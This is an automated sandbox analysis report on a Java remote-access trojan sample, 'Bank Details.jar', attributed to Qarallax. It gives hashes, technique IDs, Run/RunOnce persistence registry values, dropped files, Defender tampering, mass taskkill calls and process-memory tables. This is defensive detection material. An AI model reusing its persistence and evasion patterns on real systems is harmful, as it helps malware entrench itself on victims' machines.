qarallax | bca4b851df178e8a757d0609ae14eae486b97ec1a0693a4d92865fe8dd023d66

Analysis

max time kernel
149s
max time network
152s
platform
windows10_x64
resource
win10
submitted
25-08-2020 10:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bank Details.jar
Size

399KB
MD5

be78b9af89688c2cfb0be97cf90b2b82
SHA1

fa676fb645b4ae2ec0716b4d6efe85eacbd03617
SHA256

bca4b851df178e8a757d0609ae14eae486b97ec1a0693a4d92865fe8dd023d66
SHA512

8cd0c8718412b10cf56c10fbfa41b1dbdeda12bfcb5997f306fd7d79a781b336e10e6e61c471f75899fc24282d5f0201b75bfa65d3284959d32a3641efff8332

Score

10^/10

trojan qarallax persistence evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae64-53.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
720	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\FVKwo\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\FVKwo\Desktop.ini	java.exe
File created	C:\Users\Admin\FVKwo\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\FVKwo\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\RUrvV	java.exe
File opened for modification	C:\Windows\System32\RUrvV	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
2648	taskkill.exe
728	taskkill.exe
860	taskkill.exe
968	taskkill.exe
4552	taskkill.exe
5092	taskkill.exe
2168	taskkill.exe
4968	taskkill.exe
4240	taskkill.exe
1920	taskkill.exe
2668	taskkill.exe
4904	taskkill.exe
5032	taskkill.exe
4844	taskkill.exe
4152	taskkill.exe
4312	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1748	powershell.exe
1748	powershell.exe
1748	powershell.exe

Suspicious use of AdjustPrivilegeToken 122 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeSystemProfilePrivilege	2976	WMIC.exe
Token: SeSystemtimePrivilege	2976	WMIC.exe
Token: SeProfSingleProcessPrivilege	2976	WMIC.exe
Token: SeIncBasePriorityPrivilege	2976	WMIC.exe
Token: SeCreatePagefilePrivilege	2976	WMIC.exe
Token: SeBackupPrivilege	2976	WMIC.exe
Token: SeRestorePrivilege	2976	WMIC.exe
Token: SeShutdownPrivilege	2976	WMIC.exe
Token: SeDebugPrivilege	2976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2976	WMIC.exe
Token: SeRemoteShutdownPrivilege	2976	WMIC.exe
Token: SeUndockPrivilege	2976	WMIC.exe
Token: SeManageVolumePrivilege	2976	WMIC.exe
Token: 33	2976	WMIC.exe
Token: 34	2976	WMIC.exe
Token: 35	2976	WMIC.exe
Token: 36	2976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeSystemProfilePrivilege	2976	WMIC.exe
Token: SeSystemtimePrivilege	2976	WMIC.exe
Token: SeProfSingleProcessPrivilege	2976	WMIC.exe
Token: SeIncBasePriorityPrivilege	2976	WMIC.exe
Token: SeCreatePagefilePrivilege	2976	WMIC.exe
Token: SeBackupPrivilege	2976	WMIC.exe
Token: SeRestorePrivilege	2976	WMIC.exe
Token: SeShutdownPrivilege	2976	WMIC.exe
Token: SeDebugPrivilege	2976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2976	WMIC.exe
Token: SeRemoteShutdownPrivilege	2976	WMIC.exe
Token: SeUndockPrivilege	2976	WMIC.exe
Token: SeManageVolumePrivilege	2976	WMIC.exe
Token: 33	2976	WMIC.exe
Token: 34	2976	WMIC.exe
Token: 35	2976	WMIC.exe
Token: 36	2976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1728	WMIC.exe
Token: SeSecurityPrivilege	1728	WMIC.exe
Token: SeTakeOwnershipPrivilege	1728	WMIC.exe
Token: SeLoadDriverPrivilege	1728	WMIC.exe
Token: SeSystemProfilePrivilege	1728	WMIC.exe
Token: SeSystemtimePrivilege	1728	WMIC.exe
Token: SeProfSingleProcessPrivilege	1728	WMIC.exe
Token: SeIncBasePriorityPrivilege	1728	WMIC.exe
Token: SeCreatePagefilePrivilege	1728	WMIC.exe
Token: SeBackupPrivilege	1728	WMIC.exe
Token: SeRestorePrivilege	1728	WMIC.exe
Token: SeShutdownPrivilege	1728	WMIC.exe
Token: SeDebugPrivilege	1728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1728	WMIC.exe
Token: SeRemoteShutdownPrivilege	1728	WMIC.exe
Token: SeUndockPrivilege	1728	WMIC.exe
Token: SeManageVolumePrivilege	1728	WMIC.exe
Token: 33	1728	WMIC.exe
Token: 34	1728	WMIC.exe
Token: 35	1728	WMIC.exe
Token: 36	1728	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1728	WMIC.exe
Token: SeSecurityPrivilege	1728	WMIC.exe
Token: SeTakeOwnershipPrivilege	1728	WMIC.exe
Token: SeLoadDriverPrivilege	1728	WMIC.exe
Token: SeSystemProfilePrivilege	1728	WMIC.exe
Token: SeSystemtimePrivilege	1728	WMIC.exe
Token: SeProfSingleProcessPrivilege	1728	WMIC.exe
Token: SeIncBasePriorityPrivilege	1728	WMIC.exe
Token: SeCreatePagefilePrivilege	1728	WMIC.exe
Token: SeBackupPrivilege	1728	WMIC.exe
Token: SeRestorePrivilege	1728	WMIC.exe
Token: SeShutdownPrivilege	1728	WMIC.exe
Token: SeDebugPrivilege	1728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1728	WMIC.exe
Token: SeRemoteShutdownPrivilege	1728	WMIC.exe
Token: SeUndockPrivilege	1728	WMIC.exe
Token: SeManageVolumePrivilege	1728	WMIC.exe
Token: 33	1728	WMIC.exe
Token: 34	1728	WMIC.exe
Token: 35	1728	WMIC.exe
Token: 36	1728	WMIC.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	728	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1748	powershell.exe
Token: SeSecurityPrivilege	1748	powershell.exe
Token: SeTakeOwnershipPrivilege	1748	powershell.exe
Token: SeLoadDriverPrivilege	1748	powershell.exe
Token: SeSystemProfilePrivilege	1748	powershell.exe
Token: SeSystemtimePrivilege	1748	powershell.exe
Token: SeProfSingleProcessPrivilege	1748	powershell.exe
Token: SeIncBasePriorityPrivilege	1748	powershell.exe
Token: SeCreatePagefilePrivilege	1748	powershell.exe
Token: SeBackupPrivilege	1748	powershell.exe
Token: SeRestorePrivilege	1748	powershell.exe
Token: SeShutdownPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeSystemEnvironmentPrivilege	1748	powershell.exe
Token: SeRemoteShutdownPrivilege	1748	powershell.exe
Token: SeUndockPrivilege	1748	powershell.exe
Token: SeManageVolumePrivilege	1748	powershell.exe
Token: 33	1748	powershell.exe
Token: 34	1748	powershell.exe
Token: 35	1748	powershell.exe
Token: 36	1748	powershell.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeDebugPrivilege	2668	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	4552	taskkill.exe
Token: SeDebugPrivilege	4844	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: SeDebugPrivilege	5092	taskkill.exe
Token: SeDebugPrivilege	4152	taskkill.exe
Token: SeDebugPrivilege	4240	taskkill.exe
Token: SeDebugPrivilege	4312	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
720	java.exe

Suspicious use of WriteProcessMemory 382 IoCs

description	pid	Process	procid_target
PID 720 wrote to memory of 3396	720	java.exe	68
PID 720 wrote to memory of 3396	720	java.exe	68
PID 720 wrote to memory of 3400	720	java.exe	70
PID 720 wrote to memory of 3400	720	java.exe	70
PID 3400 wrote to memory of 2976	3400	cmd.exe	72
PID 3400 wrote to memory of 2976	3400	cmd.exe	72
PID 720 wrote to memory of 1944	720	java.exe	73
PID 720 wrote to memory of 1944	720	java.exe	73
PID 1944 wrote to memory of 1728	1944	cmd.exe	75
PID 1944 wrote to memory of 1728	1944	cmd.exe	75
PID 720 wrote to memory of 3832	720	java.exe	76
PID 720 wrote to memory of 3832	720	java.exe	76
PID 720 wrote to memory of 3068	720	java.exe	78
PID 720 wrote to memory of 3068	720	java.exe	78
PID 720 wrote to memory of 3780	720	java.exe	80
PID 720 wrote to memory of 3780	720	java.exe	80
PID 720 wrote to memory of 2528	720	java.exe	81
PID 720 wrote to memory of 2528	720	java.exe	81
PID 720 wrote to memory of 3824	720	java.exe	83
PID 720 wrote to memory of 3824	720	java.exe	83
PID 720 wrote to memory of 608	720	java.exe	85
PID 720 wrote to memory of 608	720	java.exe	85
PID 720 wrote to memory of 996	720	java.exe	87
PID 720 wrote to memory of 996	720	java.exe	87
PID 720 wrote to memory of 1960	720	java.exe	89
PID 720 wrote to memory of 1960	720	java.exe	89
PID 720 wrote to memory of 1348	720	java.exe	92
PID 720 wrote to memory of 1348	720	java.exe	92
PID 720 wrote to memory of 1748	720	java.exe	94
PID 720 wrote to memory of 1748	720	java.exe	94
PID 720 wrote to memory of 1844	720	java.exe	95
PID 720 wrote to memory of 1844	720	java.exe	95
PID 720 wrote to memory of 1752	720	java.exe	96
PID 720 wrote to memory of 1752	720	java.exe	96
PID 720 wrote to memory of 1920	720	java.exe	97
PID 720 wrote to memory of 1920	720	java.exe	97
PID 720 wrote to memory of 1500	720	java.exe	102
PID 720 wrote to memory of 1500	720	java.exe	102
PID 720 wrote to memory of 60	720	java.exe	103
PID 720 wrote to memory of 60	720	java.exe	103
PID 720 wrote to memory of 2684	720	java.exe	106
PID 720 wrote to memory of 2684	720	java.exe	106
PID 720 wrote to memory of 3752	720	java.exe	107
PID 720 wrote to memory of 3752	720	java.exe	107
PID 720 wrote to memory of 3932	720	java.exe	110
PID 720 wrote to memory of 3932	720	java.exe	110
PID 720 wrote to memory of 3848	720	java.exe	111
PID 720 wrote to memory of 3848	720	java.exe	111
PID 720 wrote to memory of 1196	720	java.exe	114
PID 720 wrote to memory of 1196	720	java.exe	114
PID 720 wrote to memory of 3356	720	java.exe	116
PID 720 wrote to memory of 3356	720	java.exe	116
PID 720 wrote to memory of 924	720	java.exe	118
PID 720 wrote to memory of 924	720	java.exe	118
PID 1348 wrote to memory of 1880	1348	cmd.exe	120
PID 1348 wrote to memory of 1880	1348	cmd.exe	120
PID 720 wrote to memory of 2036	720	java.exe	121
PID 720 wrote to memory of 2036	720	java.exe	121
PID 720 wrote to memory of 344	720	java.exe	124
PID 720 wrote to memory of 344	720	java.exe	124
PID 720 wrote to memory of 3028	720	java.exe	126
PID 720 wrote to memory of 3028	720	java.exe	126
PID 720 wrote to memory of 1500	720	java.exe	128
PID 720 wrote to memory of 1500	720	java.exe	128
PID 720 wrote to memory of 3828	720	java.exe	130
PID 720 wrote to memory of 3828	720	java.exe	130
PID 720 wrote to memory of 3784	720	java.exe	132
PID 720 wrote to memory of 3784	720	java.exe	132
PID 1348 wrote to memory of 3816	1348	cmd.exe	133
PID 1348 wrote to memory of 3816	1348	cmd.exe	133
PID 720 wrote to memory of 2648	720	java.exe	134
PID 720 wrote to memory of 2648	720	java.exe	134
PID 720 wrote to memory of 612	720	java.exe	136
PID 720 wrote to memory of 612	720	java.exe	136
PID 720 wrote to memory of 60	720	java.exe	139
PID 720 wrote to memory of 60	720	java.exe	139
PID 720 wrote to memory of 2976	720	java.exe	141
PID 720 wrote to memory of 2976	720	java.exe	141
PID 720 wrote to memory of 832	720	java.exe	143
PID 720 wrote to memory of 832	720	java.exe	143
PID 832 wrote to memory of 3824	832	cmd.exe	145
PID 832 wrote to memory of 3824	832	cmd.exe	145
PID 832 wrote to memory of 3156	832	cmd.exe	146
PID 832 wrote to memory of 3156	832	cmd.exe	146
PID 720 wrote to memory of 2540	720	java.exe	147
PID 720 wrote to memory of 2540	720	java.exe	147
PID 2540 wrote to memory of 3400	2540	cmd.exe	149
PID 2540 wrote to memory of 3400	2540	cmd.exe	149
PID 2540 wrote to memory of 2504	2540	cmd.exe	150
PID 2540 wrote to memory of 2504	2540	cmd.exe	150
PID 720 wrote to memory of 1456	720	java.exe	151
PID 720 wrote to memory of 1456	720	java.exe	151
PID 720 wrote to memory of 728	720	java.exe	153
PID 720 wrote to memory of 728	720	java.exe	153
PID 1456 wrote to memory of 912	1456	cmd.exe	155
PID 1456 wrote to memory of 912	1456	cmd.exe	155
PID 1456 wrote to memory of 468	1456	cmd.exe	156
PID 1456 wrote to memory of 468	1456	cmd.exe	156
PID 720 wrote to memory of 968	720	java.exe	157
PID 720 wrote to memory of 968	720	java.exe	157
PID 968 wrote to memory of 2684	968	cmd.exe	159
PID 968 wrote to memory of 2684	968	cmd.exe	159
PID 968 wrote to memory of 612	968	cmd.exe	160
PID 968 wrote to memory of 612	968	cmd.exe	160
PID 720 wrote to memory of 2368	720	java.exe	161
PID 720 wrote to memory of 2368	720	java.exe	161
PID 2368 wrote to memory of 3328	2368	cmd.exe	164
PID 2368 wrote to memory of 3328	2368	cmd.exe	164
PID 2368 wrote to memory of 1464	2368	cmd.exe	165
PID 2368 wrote to memory of 1464	2368	cmd.exe	165
PID 720 wrote to memory of 3024	720	java.exe	166
PID 720 wrote to memory of 3024	720	java.exe	166
PID 3024 wrote to memory of 1356	3024	cmd.exe	168
PID 3024 wrote to memory of 1356	3024	cmd.exe	168
PID 3024 wrote to memory of 2792	3024	cmd.exe	169
PID 3024 wrote to memory of 2792	3024	cmd.exe	169
PID 720 wrote to memory of 2052	720	java.exe	170
PID 720 wrote to memory of 2052	720	java.exe	170
PID 2052 wrote to memory of 2068	2052	cmd.exe	172
PID 2052 wrote to memory of 2068	2052	cmd.exe	172
PID 2052 wrote to memory of 3904	2052	cmd.exe	173
PID 2052 wrote to memory of 3904	2052	cmd.exe	173
PID 720 wrote to memory of 3188	720	java.exe	174
PID 720 wrote to memory of 3188	720	java.exe	174
PID 3188 wrote to memory of 828	3188	cmd.exe	176
PID 3188 wrote to memory of 828	3188	cmd.exe	176
PID 3188 wrote to memory of 3612	3188	cmd.exe	177
PID 3188 wrote to memory of 3612	3188	cmd.exe	177
PID 720 wrote to memory of 912	720	java.exe	178
PID 720 wrote to memory of 912	720	java.exe	178
PID 720 wrote to memory of 2168	720	java.exe	180
PID 720 wrote to memory of 2168	720	java.exe	180
PID 912 wrote to memory of 3424	912	cmd.exe	182
PID 912 wrote to memory of 3424	912	cmd.exe	182
PID 912 wrote to memory of 708	912	cmd.exe	183
PID 912 wrote to memory of 708	912	cmd.exe	183
PID 720 wrote to memory of 3932	720	java.exe	184
PID 720 wrote to memory of 3932	720	java.exe	184
PID 3932 wrote to memory of 1920	3932	cmd.exe	186
PID 3932 wrote to memory of 1920	3932	cmd.exe	186
PID 3932 wrote to memory of 1228	3932	cmd.exe	187
PID 3932 wrote to memory of 1228	3932	cmd.exe	187
PID 720 wrote to memory of 1756	720	java.exe	188
PID 720 wrote to memory of 1756	720	java.exe	188
PID 1756 wrote to memory of 2528	1756	cmd.exe	190
PID 1756 wrote to memory of 2528	1756	cmd.exe	190
PID 1756 wrote to memory of 3884	1756	cmd.exe	191
PID 1756 wrote to memory of 3884	1756	cmd.exe	191
PID 720 wrote to memory of 1748	720	java.exe	192
PID 720 wrote to memory of 1748	720	java.exe	192
PID 1748 wrote to memory of 3732	1748	cmd.exe	194
PID 1748 wrote to memory of 3732	1748	cmd.exe	194
PID 1748 wrote to memory of 3904	1748	cmd.exe	195
PID 1748 wrote to memory of 3904	1748	cmd.exe	195
PID 720 wrote to memory of 488	720	java.exe	196
PID 720 wrote to memory of 488	720	java.exe	196
PID 488 wrote to memory of 728	488	cmd.exe	198
PID 488 wrote to memory of 728	488	cmd.exe	198
PID 488 wrote to memory of 396	488	cmd.exe	199
PID 488 wrote to memory of 396	488	cmd.exe	199
PID 720 wrote to memory of 3804	720	java.exe	200
PID 720 wrote to memory of 3804	720	java.exe	200
PID 3804 wrote to memory of 480	3804	cmd.exe	202
PID 3804 wrote to memory of 480	3804	cmd.exe	202
PID 720 wrote to memory of 860	720	java.exe	203
PID 720 wrote to memory of 860	720	java.exe	203
PID 3804 wrote to memory of 3696	3804	cmd.exe	205
PID 3804 wrote to memory of 3696	3804	cmd.exe	205
PID 720 wrote to memory of 2968	720	java.exe	206
PID 720 wrote to memory of 2968	720	java.exe	206
PID 2968 wrote to memory of 2068	2968	cmd.exe	208
PID 2968 wrote to memory of 2068	2968	cmd.exe	208
PID 2968 wrote to memory of 3652	2968	cmd.exe	209
PID 2968 wrote to memory of 3652	2968	cmd.exe	209
PID 720 wrote to memory of 3816	720	java.exe	210
PID 720 wrote to memory of 3816	720	java.exe	210
PID 3816 wrote to memory of 396	3816	cmd.exe	212
PID 3816 wrote to memory of 396	3816	cmd.exe	212
PID 3816 wrote to memory of 2464	3816	cmd.exe	213
PID 3816 wrote to memory of 2464	3816	cmd.exe	213
PID 720 wrote to memory of 2840	720	java.exe	214
PID 720 wrote to memory of 2840	720	java.exe	214
PID 2840 wrote to memory of 1360	2840	cmd.exe	216
PID 2840 wrote to memory of 1360	2840	cmd.exe	216
PID 2840 wrote to memory of 3436	2840	cmd.exe	217
PID 2840 wrote to memory of 3436	2840	cmd.exe	217
PID 720 wrote to memory of 3884	720	java.exe	218
PID 720 wrote to memory of 3884	720	java.exe	218
PID 3884 wrote to memory of 2408	3884	cmd.exe	220
PID 3884 wrote to memory of 2408	3884	cmd.exe	220
PID 3884 wrote to memory of 2684	3884	cmd.exe	221
PID 3884 wrote to memory of 2684	3884	cmd.exe	221
PID 720 wrote to memory of 392	720	java.exe	222
PID 720 wrote to memory of 392	720	java.exe	222
PID 392 wrote to memory of 880	392	cmd.exe	224
PID 392 wrote to memory of 880	392	cmd.exe	224
PID 392 wrote to memory of 3368	392	cmd.exe	225
PID 392 wrote to memory of 3368	392	cmd.exe	225
PID 720 wrote to memory of 1004	720	java.exe	226
PID 720 wrote to memory of 1004	720	java.exe	226
PID 1004 wrote to memory of 1240	1004	cmd.exe	228
PID 1004 wrote to memory of 1240	1004	cmd.exe	228
PID 1004 wrote to memory of 916	1004	cmd.exe	229
PID 1004 wrote to memory of 916	1004	cmd.exe	229
PID 720 wrote to memory of 1756	720	java.exe	230
PID 720 wrote to memory of 1756	720	java.exe	230
PID 1756 wrote to memory of 3804	1756	cmd.exe	232
PID 1756 wrote to memory of 3804	1756	cmd.exe	232
PID 1756 wrote to memory of 1196	1756	cmd.exe	233
PID 1756 wrote to memory of 1196	1756	cmd.exe	233
PID 720 wrote to memory of 3824	720	java.exe	234
PID 720 wrote to memory of 3824	720	java.exe	234
PID 3824 wrote to memory of 3416	3824	cmd.exe	236
PID 3824 wrote to memory of 3416	3824	cmd.exe	236
PID 720 wrote to memory of 2668	720	java.exe	237
PID 720 wrote to memory of 2668	720	java.exe	237
PID 3824 wrote to memory of 2100	3824	cmd.exe	239
PID 3824 wrote to memory of 2100	3824	cmd.exe	239
PID 720 wrote to memory of 3672	720	java.exe	240
PID 720 wrote to memory of 3672	720	java.exe	240
PID 3672 wrote to memory of 644	3672	cmd.exe	242
PID 3672 wrote to memory of 644	3672	cmd.exe	242
PID 3672 wrote to memory of 3888	3672	cmd.exe	243
PID 3672 wrote to memory of 3888	3672	cmd.exe	243
PID 720 wrote to memory of 2464	720	java.exe	244
PID 720 wrote to memory of 2464	720	java.exe	244
PID 2464 wrote to memory of 1228	2464	cmd.exe	246
PID 2464 wrote to memory of 1228	2464	cmd.exe	246
PID 2464 wrote to memory of 1584	2464	cmd.exe	247
PID 2464 wrote to memory of 1584	2464	cmd.exe	247
PID 720 wrote to memory of 3848	720	java.exe	248
PID 720 wrote to memory of 3848	720	java.exe	248
PID 3848 wrote to memory of 3796	3848	cmd.exe	250
PID 3848 wrote to memory of 3796	3848	cmd.exe	250
PID 3848 wrote to memory of 3808	3848	cmd.exe	251
PID 3848 wrote to memory of 3808	3848	cmd.exe	251
PID 720 wrote to memory of 3864	720	java.exe	252
PID 720 wrote to memory of 3864	720	java.exe	252
PID 3864 wrote to memory of 1508	3864	cmd.exe	254
PID 3864 wrote to memory of 1508	3864	cmd.exe	254
PID 3864 wrote to memory of 1612	3864	cmd.exe	255
PID 3864 wrote to memory of 1612	3864	cmd.exe	255
PID 720 wrote to memory of 2052	720	java.exe	256
PID 720 wrote to memory of 2052	720	java.exe	256
PID 2052 wrote to memory of 1940	2052	cmd.exe	258
PID 2052 wrote to memory of 1940	2052	cmd.exe	258
PID 2052 wrote to memory of 2792	2052	cmd.exe	259
PID 2052 wrote to memory of 2792	2052	cmd.exe	259
PID 720 wrote to memory of 3024	720	java.exe	260
PID 720 wrote to memory of 3024	720	java.exe	260
PID 3024 wrote to memory of 2540	3024	cmd.exe	262
PID 3024 wrote to memory of 2540	3024	cmd.exe	262
PID 3024 wrote to memory of 2688	3024	cmd.exe	263
PID 3024 wrote to memory of 2688	3024	cmd.exe	263
PID 720 wrote to memory of 644	720	java.exe	264
PID 720 wrote to memory of 644	720	java.exe	264
PID 644 wrote to memory of 860	644	cmd.exe	266
PID 644 wrote to memory of 860	644	cmd.exe	266
PID 644 wrote to memory of 3904	644	cmd.exe	267
PID 644 wrote to memory of 3904	644	cmd.exe	267
PID 720 wrote to memory of 3160	720	java.exe	268
PID 720 wrote to memory of 3160	720	java.exe	268
PID 3160 wrote to memory of 3440	3160	cmd.exe	270
PID 3160 wrote to memory of 3440	3160	cmd.exe	270
PID 3160 wrote to memory of 916	3160	cmd.exe	271
PID 3160 wrote to memory of 916	3160	cmd.exe	271
PID 720 wrote to memory of 968	720	java.exe	272
PID 720 wrote to memory of 968	720	java.exe	272
PID 720 wrote to memory of 488	720	java.exe	274
PID 720 wrote to memory of 488	720	java.exe	274
PID 488 wrote to memory of 1356	488	cmd.exe	276
PID 488 wrote to memory of 1356	488	cmd.exe	276
PID 488 wrote to memory of 3436	488	cmd.exe	277
PID 488 wrote to memory of 3436	488	cmd.exe	277
PID 720 wrote to memory of 3652	720	java.exe	278
PID 720 wrote to memory of 3652	720	java.exe	278
PID 3652 wrote to memory of 2996	3652	cmd.exe	280
PID 3652 wrote to memory of 2996	3652	cmd.exe	280
PID 3652 wrote to memory of 3004	3652	cmd.exe	281
PID 3652 wrote to memory of 3004	3652	cmd.exe	281
PID 720 wrote to memory of 728	720	java.exe	282
PID 720 wrote to memory of 728	720	java.exe	282
PID 728 wrote to memory of 1664	728	cmd.exe	284
PID 728 wrote to memory of 1664	728	cmd.exe	284
PID 728 wrote to memory of 1456	728	cmd.exe	285
PID 728 wrote to memory of 1456	728	cmd.exe	285
PID 720 wrote to memory of 1480	720	java.exe	286
PID 720 wrote to memory of 1480	720	java.exe	286
PID 1480 wrote to memory of 1628	1480	cmd.exe	288
PID 1480 wrote to memory of 1628	1480	cmd.exe	288
PID 1480 wrote to memory of 916	1480	cmd.exe	289
PID 1480 wrote to memory of 916	1480	cmd.exe	289
PID 720 wrote to memory of 468	720	java.exe	290
PID 720 wrote to memory of 468	720	java.exe	290
PID 468 wrote to memory of 2844	468	cmd.exe	292
PID 468 wrote to memory of 2844	468	cmd.exe	292
PID 468 wrote to memory of 3352	468	cmd.exe	293
PID 468 wrote to memory of 3352	468	cmd.exe	293
PID 720 wrote to memory of 2136	720	java.exe	294
PID 720 wrote to memory of 2136	720	java.exe	294
PID 2136 wrote to memory of 2688	2136	cmd.exe	296
PID 2136 wrote to memory of 2688	2136	cmd.exe	296
PID 2136 wrote to memory of 1240	2136	cmd.exe	297
PID 2136 wrote to memory of 1240	2136	cmd.exe	297
PID 720 wrote to memory of 2668	720	java.exe	298
PID 720 wrote to memory of 2668	720	java.exe	298
PID 2668 wrote to memory of 3352	2668	cmd.exe	300
PID 2668 wrote to memory of 3352	2668	cmd.exe	300
PID 2668 wrote to memory of 1240	2668	cmd.exe	301
PID 2668 wrote to memory of 1240	2668	cmd.exe	301
PID 720 wrote to memory of 4104	720	java.exe	302
PID 720 wrote to memory of 4104	720	java.exe	302
PID 4104 wrote to memory of 4140	4104	cmd.exe	304
PID 4104 wrote to memory of 4140	4104	cmd.exe	304
PID 4104 wrote to memory of 4160	4104	cmd.exe	305
PID 4104 wrote to memory of 4160	4104	cmd.exe	305
PID 720 wrote to memory of 4180	720	java.exe	306
PID 720 wrote to memory of 4180	720	java.exe	306
PID 4180 wrote to memory of 4216	4180	cmd.exe	308
PID 4180 wrote to memory of 4216	4180	cmd.exe	308
PID 4180 wrote to memory of 4236	4180	cmd.exe	309
PID 4180 wrote to memory of 4236	4180	cmd.exe	309
PID 720 wrote to memory of 4256	720	java.exe	310
PID 720 wrote to memory of 4256	720	java.exe	310
PID 4256 wrote to memory of 4292	4256	cmd.exe	312
PID 4256 wrote to memory of 4292	4256	cmd.exe	312
PID 4256 wrote to memory of 4312	4256	cmd.exe	313
PID 4256 wrote to memory of 4312	4256	cmd.exe	313
PID 720 wrote to memory of 4332	720	java.exe	314
PID 720 wrote to memory of 4332	720	java.exe	314
PID 4332 wrote to memory of 4368	4332	cmd.exe	316
PID 4332 wrote to memory of 4368	4332	cmd.exe	316
PID 4332 wrote to memory of 4388	4332	cmd.exe	317
PID 4332 wrote to memory of 4388	4332	cmd.exe	317
PID 720 wrote to memory of 4408	720	java.exe	318
PID 720 wrote to memory of 4408	720	java.exe	318
PID 4408 wrote to memory of 4444	4408	cmd.exe	320
PID 4408 wrote to memory of 4444	4408	cmd.exe	320
PID 4408 wrote to memory of 4464	4408	cmd.exe	321
PID 4408 wrote to memory of 4464	4408	cmd.exe	321
PID 720 wrote to memory of 4484	720	java.exe	322
PID 720 wrote to memory of 4484	720	java.exe	322
PID 4484 wrote to memory of 4520	4484	cmd.exe	324
PID 4484 wrote to memory of 4520	4484	cmd.exe	324
PID 4484 wrote to memory of 4540	4484	cmd.exe	325
PID 4484 wrote to memory of 4540	4484	cmd.exe	325
PID 720 wrote to memory of 4552	720	java.exe	326
PID 720 wrote to memory of 4552	720	java.exe	326
PID 720 wrote to memory of 4600	720	java.exe	328
PID 720 wrote to memory of 4600	720	java.exe	328
PID 4600 wrote to memory of 4656	4600	cmd.exe	330
PID 4600 wrote to memory of 4656	4600	cmd.exe	330
PID 4600 wrote to memory of 4672	4600	cmd.exe	331
PID 4600 wrote to memory of 4672	4600	cmd.exe	331
PID 720 wrote to memory of 4692	720	java.exe	332
PID 720 wrote to memory of 4692	720	java.exe	332
PID 4692 wrote to memory of 4728	4692	cmd.exe	334
PID 4692 wrote to memory of 4728	4692	cmd.exe	334
PID 4692 wrote to memory of 4748	4692	cmd.exe	335
PID 4692 wrote to memory of 4748	4692	cmd.exe	335
PID 720 wrote to memory of 4768	720	java.exe	336
PID 720 wrote to memory of 4768	720	java.exe	336
PID 4768 wrote to memory of 4804	4768	cmd.exe	338
PID 4768 wrote to memory of 4804	4768	cmd.exe	338
PID 4768 wrote to memory of 4824	4768	cmd.exe	339
PID 4768 wrote to memory of 4824	4768	cmd.exe	339
PID 720 wrote to memory of 4844	720	java.exe	340
PID 720 wrote to memory of 4844	720	java.exe	340
PID 720 wrote to memory of 4904	720	java.exe	342
PID 720 wrote to memory of 4904	720	java.exe	342
PID 720 wrote to memory of 4968	720	java.exe	344
PID 720 wrote to memory of 4968	720	java.exe	344
PID 720 wrote to memory of 5032	720	java.exe	346
PID 720 wrote to memory of 5032	720	java.exe	346
PID 720 wrote to memory of 5092	720	java.exe	348
PID 720 wrote to memory of 5092	720	java.exe	348
PID 720 wrote to memory of 4152	720	java.exe	350
PID 720 wrote to memory of 4152	720	java.exe	350
PID 720 wrote to memory of 4240	720	java.exe	352
